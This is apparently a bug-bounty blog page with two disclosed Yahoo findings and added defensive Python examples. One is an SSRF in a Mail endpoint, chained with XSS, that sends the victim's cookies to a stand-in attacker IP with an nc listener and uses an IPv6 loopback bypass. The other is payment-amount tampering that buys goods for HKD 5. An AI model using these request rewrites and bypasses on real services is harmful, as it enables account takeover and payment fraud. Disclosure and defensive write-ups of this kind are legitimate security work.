When Server Side Request Forgery Combines with Cross Site Scripting

Summary

Hi, this is my third post about my Bug Hunting Journey. This finding is an interesting one, as it demonstrates how to chain different types of bugs in order to completely take over a victim’s account. This finding allowed me to take over your Yahoo account with just a click on a link. Sounds scary? Read on.

GET /d/xxxxxxxx/xxxxxxx?appid=YMail&crumb=kPun5CrTk1R&wssid=&clientId=mailsearch&timezone=Asia%2FHong_Kong&allowGoogleDocs=1&ymreqid=a5551380-75ce-13d6-1c16-c00001016500&url=http%3A%2F%2Fprod.mail.bf1.yahoo.com%2Fglasd%3f%2F%3FaccountIds%3D1%26timezone%3DAsia%252FHong_Kong%26mailboxid%3DBjJ-0j4oSqYSwadMXdzKCqzxjQ0gZZDkccM7CRStMSDerKbSfJwDAjhyiIZLOLd5xlNdGH4nkLovJSeSm65J69qU1w%26appid%3DYMail%26query%3Dis%253Aunread%26limit%3D50%26excludefolders%3DARCHIVE%26threads%3Dtrue%26vertical%3DMESSAGES%26order%3Dtime%2Bdesc%26cursor%3D49&listContentType=IMAGE

Take some time to read the request, and try to find something unusual in it.

Not sure what you think is unusual, but the url parameter looked quite fun to me, because it seems I can control the destination of the url: by changing http%3A%2F%2Fprod.mail.bf1.yahoo.com%2F to http%3Amysite.com, I could make a Server Side Request Forgery.

So I did the test and made it point to my own server: I set up nc -lnvp 80 to listen for the traffic. The traffic went through, and my Yahoo Cookie header was included in the GET request from the Yahoo server.

Let’s do a quick recap. First, set up nc -lnvp 80 on my server; let’s say my server’s IP address is 123.123.123.123.

Then make a GET request to my server by changing http%3A%2F%2Fprod.mail.bf1.yahoo.com%2F to http%3A123.123.123.123.

Finally, a Yahoo-owned server made a request to my 123.123.123.123 and included all of my Yahoo headers in the request.

I could further confirm it was vulnerable to internal scanning as well. Changing the url to http://127.0.0.1 failed, so I used another trick, http://::80, which is IPv6; this bypassed the 127.0.0.1 check, and then I was able to perform internal port scanning and other behaviour as well.
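As an added example (this is not code from the post, and not Yahoo’s code), here is the server-side check a practitioner would want on the url parameter of the request above: a substring test for 127.0.0.1 of the kind the post describes bypassing, next to a hardened version that parses the URL, refuses every IP literal (including IPv6 forms such as ::, ::1 and the IPv4-mapped ::ffff:127.0.0.1) and only allows an explicit hostname allowlist. The allowlist host prod.mail.bf1.yahoo.com is taken from the request; the function names and the single-host allowlist are assumptions made for illustration. The query string embedded below is the one from the request in the post.

```python
"""Added example: naive vs. hardened SSRF target check for the `url` parameter.
Not Yahoo's code; the allowlist and helper names are assumptions."""
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Assumption: the only upstream this endpoint should ever be asked to fetch.
ALLOWED_HOSTS = {"prod.mail.bf1.yahoo.com"}

# The query string of the GET request shown in the post, verbatim.
ORIGINAL_QUERY = (
    "appid=YMail&crumb=kPun5CrTk1R&wssid=&clientId=mailsearch&timezone=Asia%2FHong_Kong"
    "&allowGoogleDocs=1&ymreqid=a5551380-75ce-13d6-1c16-c00001016500"
    "&url=http%3A%2F%2Fprod.mail.bf1.yahoo.com%2Fglasd%3f%2F%3FaccountIds%3D1%26timezone%3DAsia%252FHong_Kong"
    "%26mailboxid%3DBjJ-0j4oSqYSwadMXdzKCqzxjQ0gZZDkccM7CRStMSDerKbSfJwDAjhyiIZLOLd5xlNdGH4nkLovJSeSm65J69qU1w"
    "%26appid%3DYMail%26query%3Dis%253Aunread%26limit%3D50%26excludefolders%3DARCHIVE%26threads%3Dtrue"
    "%26vertical%3DMESSAGES%26order%3Dtime%2Bdesc%26cursor%3D49&listContentType=IMAGE"
)


def target_url(query):
    """Return the decoded `url` parameter of a query string (None if absent)."""
    return parse_qs(query).get("url", [None])[0]


def attacker_query(server_ip="123.123.123.123"):
    """Rewrite the url parameter exactly as the post describes (http%3A<ip>)."""
    return ORIGINAL_QUERY.replace(
        "http%3A%2F%2Fprod.mail.bf1.yahoo.com%2F", "http%3A" + server_ip)


def naive_is_safe(url):
    """The kind of check the post describes bypassing: a substring test."""
    return "127.0.0.1" not in url


def is_internal_ip(host):
    """True if `host` is an IP literal that must never be fetched server-side.
    Non-literal hostnames return False; those are judged by the allowlist."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    # ::ffff:127.0.0.1 is an IPv6 literal that reaches IPv4 loopback; unwrap it.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_unspecified or ip.is_private
            or ip.is_link_local or ip.is_multicast or ip.is_reserved)


def hardened_is_safe(url, allowed_hosts=ALLOWED_HOSTS):
    """Allowlist the hostname; reject every IP literal and anything unparseable."""
    if not url:
        return False
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname  # lower-cased, brackets stripped; None if missing
    if not host or is_internal_ip(host):
        return False
    try:
        ipaddress.ip_address(host)
        return False  # even a public IP literal sidesteps the allowlist
    except ValueError:
        pass
    return host in allowed_hosts


if __name__ == "__main__":
    for candidate in (target_url(ORIGINAL_QUERY), target_url(attacker_query()),
                      "http://127.0.0.1/", "http://::80", "http://[::1]:80/",
                      "http://[::ffff:127.0.0.1]/"):
        print(f"naive={naive_is_safe(candidate)!s:5} "
              f"hardened={hardened_is_safe(candidate)!s:5} {candidate[:60]}")
```

Even with the target check in place, the fetch itself should not carry the caller’s own session cookies: the post shows the proxying server attaching the user’s Cookie header to an outbound request, so the upstream credentials should be chosen server-side per allowlisted host rather than copied from the inbound request.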

Remember I said in the title that I could own your Yahoo account with only one click? It is not clickbait, it is true: when this attack is combined with the XSS recently discovered by klikki, an attacker can do more than just view the victim’s email. He can actually take over their account by forcing them to make the SSRF request to an attacker-owned server and getting a copy of their cookies.

Abusing Multistage Logic Flaw to Buy Anything for Free at hk.deals.yahoo.com

Welcome, this is the first write-up of my Bug Bounty Journey. It explains how I earned a $3000 reward from Yahoo; I hope you enjoy it.

Introduction

I started my Bug Bounty Journey after finishing my OSCP lab session in June. I started by checking yahoo.com.hk first, and it didn’t go well for a month, but after I read the book “The Web Application Hacker’s Handbook”, I suddenly realized there might be a multistage logic flaw in the Yahoo Deals checkout process, so I decided to take a look, fuzz around, and see what could go wrong in the process. I finally came up with a bug that allowed me to buy arbitrary items at an arbitrary price on https://hk.deals.yahoo.com, https://hk.shop.yahoo.com and https://hk.auctions.yahoo.com.

Let’s start digging

Yahoo! Deals, Shop and Auctions are quite prominent services in Hong Kong; they provide a platform that allows users to trade items through the Yahoo payment system. I started to buy an item at hk.shop.yahoo.com, followed along the process, and monitored the traffic with Burp Suite.

Buying Page in Yahoo
Entering Delivery Content in Yahoo

When I checked the checkout traffic, this is where things started to get interesting. Here is the request made when I pressed “Check Out Now”.

Checkout in Cart Burp Interception

If we look closely, you can see the orderInfo has something important: paymentAmount is sent in plain text, in this case 450 HKD. I found this interesting and decided to manipulate this amount throughout the process. Fortunately, the Yahoo system keeps validating the paymentAmount; when I changed the paymentAmount to other values, it returned this page.

Checkout Error when trying to manipulate the paymentAmount

I kept experimenting and could not find a way to bypass its validation on price, until I finally reached the part where I was redirected to a third-party payment system to finish my credit card payment. Due to its sensitive nature, I am not going to include the name of the third-party payment system here.

Here is the Burp interception of the redirection

Details of Redirection of Third Party Payment Checkout Process

If we look closely at the Referer header and the POST parameter “amount”, we can see the amount is once again transmitted in plain text, so I intuitively manipulated the amount to “5” in both places, and the result was a surprise.

A Payment Page that is stating to accept HKD 5

From this point onward everything went smoothly: I entered my credit card info, passed the mobile phone SMS authentication, and after finishing I was presented with this page.

Successful Checkout Page in Yahoo

I did a final check on my credit card statement; the payment amount was indeed 5 HKD.

The End

I believe the consequences of this bug are self-explanatory, so I am going to pass on explaining how this would affect Yahoo. This kind of vulnerability is a classic case of lacking validation on client-supplied data, and it can lead to disastrous results like bypassing a login mechanism, transferring money to an unauthenticated account, and, in this case, purchasing items at a client-supplied price.
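As an added example (not code from the post, from Yahoo, or from the payment provider), here is what the checkout-to-gateway handoff looks like when the amount is trusted from the browser, next to a design in which the merchant fills the gateway form from its own order record, signs the fields with a secret shared with the gateway, and re-checks the charged amount against the order on the gateway’s callback before marking it paid. The order store, the field names, the HMAC-SHA256 scheme and the shared secret are assumptions; the 450 HKD order and the tampered value of 5 mirror the post.

```python
"""Added example: amount handling for the merchant -> payment gateway handoff.
Illustrative only; order store, field names and signing scheme are assumptions."""
import hashlib
import hmac

# Constructed sample order, mirroring the 450 HKD purchase in the post.
ORDERS = {"ORD-1": {"amount": "450.00", "currency": "HKD", "status": "pending"}}
GATEWAY_SECRET = b"shared-secret-between-merchant-and-gateway"  # assumption


def vulnerable_payment_form(order_id, client_amount):
    """What the post describes: the amount the browser sent is forwarded as-is,
    so a tampered POST parameter reaches the gateway unchanged."""
    return {"order_id": order_id, "amount": client_amount, "currency": "HKD"}


def sign_fields(fields, secret):
    """HMAC-SHA256 over the sorted key=value pairs (assumed canonical form)."""
    canonical = "&".join(f"{k}={fields[k]}" for k in sorted(fields))
    return hmac.new(secret, canonical.encode(), hashlib.sha256).hexdigest()


def signed_payment_form(order_id, secret=GATEWAY_SECRET):
    """Merchant side: build the gateway POST from the server-side order record
    (never from client input) and sign it, so the browser cannot alter it."""
    order = ORDERS[order_id]
    fields = {"order_id": order_id, "amount": order["amount"],
              "currency": order["currency"]}
    fields["sig"] = sign_fields(fields, secret)
    return fields


def gateway_accepts(fields, secret=GATEWAY_SECRET):
    """Gateway side: refuse any form whose signed fields were altered in transit."""
    supplied = fields.get("sig", "")
    unsigned = {k: v for k, v in fields.items() if k != "sig"}
    return hmac.compare_digest(sign_fields(unsigned, secret), supplied)


def gateway_notification(order_id, amount, currency="HKD", secret=GATEWAY_SECRET):
    """Constructed callback the gateway would send after charging `amount`."""
    fields = {"order_id": order_id, "amount": amount, "currency": currency}
    fields["sig"] = sign_fields(fields, secret)
    return fields


def settle(order_id, notification, secret=GATEWAY_SECRET):
    """Merchant side on the callback: verify the signature AND compare the
    charged amount with the order before marking it paid. Returns the outcome."""
    order = ORDERS[order_id]
    if not gateway_accepts(notification, secret):
        return "rejected: bad signature"
    if (notification["amount"] != order["amount"]
            or notification["currency"] != order["currency"]):
        return "rejected: amount mismatch"
    order["status"] = "paid"
    return "paid"


if __name__ == "__main__":
    print("vulnerable form:", vulnerable_payment_form("ORD-1", "5"))
    form = signed_payment_form("ORD-1")
    print("signed form accepted:", gateway_accepts(form))
    print("tampered form accepted:", gateway_accepts(dict(form, amount="5")))
    print("settle 5 HKD:", settle("ORD-1", gateway_notification("ORD-1", "5")))
    print("settle 450 HKD:", settle("ORD-1", gateway_notification("ORD-1", "450.00")))
```

The second check in settle matters even when the redirect is signed: if the gateway can be reached through any other path (an older integration, a retry endpoint) with a smaller amount, the merchant must still refuse to mark the order paid until the amount the gateway actually charged equals the amount on the order.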

Thank you very much for reading my first bug bounty write-up; I hope you enjoyed it.

If you are a bug bounty hunter living in Hong Kong, please let me know and contact me asap, because I am desperate to find a local friend to share ideas about hunting bugs with.

Feel free to leave your thoughts below; there will be a few more write-ups coming in the next few weeks.

Timeline:

Jul 15th 2016: Reported to Yahoo

Jul 15th 2016: Received response from junot asking to confirm the credit card was indeed charged HKD 5

Jul 16th 2016: Provided credit card statement to Yahoo

Jul 20th 2016: Received response from junot that they had fixed the bug, asking me to confirm the fix

Jul 27th 2016: Received response from junot about receiving a bug bounty award of USD 3000